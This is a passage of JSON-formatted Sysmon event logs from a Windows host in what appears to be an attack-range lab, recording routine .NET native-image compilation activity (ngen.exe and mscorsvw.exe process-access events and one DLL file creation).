4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:10.256","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-22AE-5F25-0000-0010C0831000}","TargetProcessId":"4652","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:10","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8170,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:10.256\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-22AE-5F25-0000-0010C0831000}\r\nTargetProcessId: 4652\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:10.256","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-22AE-5F25-0000-0010C0831000}","TargetProcessId":"4652","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:07:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:10","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8171,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:10.256\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-22AE-5F25-0000-0010C0831000}\r\nTargetProcessId: 4652\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:10.256","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-22AE-5F25-0000-0010C0831000}","TargetProcessId":"4652","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:10","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8172,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:10.287\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 4488\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-22AE-5F25-0000-0010E8861000}\r\nTargetProcessId: 3488\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:10.287","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"4488","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-22AE-5F25-0000-0010E8861000}","TargetProcessId":"3488","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:10","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8173,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:10.287\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-22AE-5F25-0000-0010E8861000}\r\nTargetProcessId: 3488\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:10.287","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-22AE-5F25-0000-0010E8861000}","TargetProcessId":"3488","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:07:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:10","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8174,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:10.303\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-22AE-5F25-0000-0010E8861000}\r\nTargetProcessId: 3488\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:10.303","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-22AE-5F25-0000-0010E8861000}","TargetProcessId":"3488","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:10","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8175,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:10.365\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010D1A90000}\r\nSourceProcessId: 1004\r\nSourceThreadId: 4244\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-001014B90000}\r\nTargetProcessId: 1132\r\nTargetImage: C:\\Windows\\System32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+ca3e|c:\\windows\\system32\\rpcss.dll+b157|c:\\windows\\system32\\rpcss.dll+7897|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:10.365","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010D1A90000}","SourceProcessId":"1004","SourceThreadId":"4244","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-001014B90000}","TargetProcessId":"1132","TargetImage":"C:\\Windows\\System32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+ca3e|c:\\windows\\system32\\rpcss.dll+b157|c:\\windows\\system32\\rpcss.dll+7897|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:10","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8176,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:10.365\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010D1A90000}\r\nSourceProcessId: 1004\r\nSourceThreadId: 4244\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nTargetProcessId: 612\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+ca3e|c:\\windows\\system32\\rpcss.dll+b157|c:\\windows\\system32\\rpcss.dll+7897|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:10.365","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010D1A90000}","SourceProcessId":"1004","SourceThreadId":"4244","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","TargetProcessId":"612","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+ca3e|c:\\windows\\system32\\rpcss.dll+b157|c:\\windows\\system32\\rpcss.dll+7897|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:10","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8177,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:10.365\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010D1A90000}\r\nSourceProcessId: 1004\r\nSourceThreadId: 4244\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+ca3e|c:\\windows\\system32\\rpcss.dll+b157|c:\\windows\\system32\\rpcss.dll+7897|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:10.365","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010D1A90000}","SourceProcessId":"1004","SourceThreadId":"4244","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+ca3e|c:\\windows\\system32\\rpcss.dll+b157|c:\\windows\\system32\\rpcss.dll+7897|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:10","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8178,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 08:07:10.522\r\nProcessGuid: {41C8662E-22AE-5F25-0000-0010E8861000}\r\nProcessId: 3488\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\da0-0\\System.Web.RegularExpressions.dll\r\nCreationUtcTime: 2020-08-01 08:07:10.522","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 08:07:10.522","ProcessGuid":"{41C8662E-22AE-5F25-0000-0010E8861000}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\da0-0\\System.Web.RegularExpressions.dll","CreationUtcTime":"2020-08-01 08:07:10.522","EventReceivedTime":"2020-08-01 08:07:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:10","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8179,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:10.553\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-228F-5F25-0000-001076560F00}\r\nTargetProcessId: 1464\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: 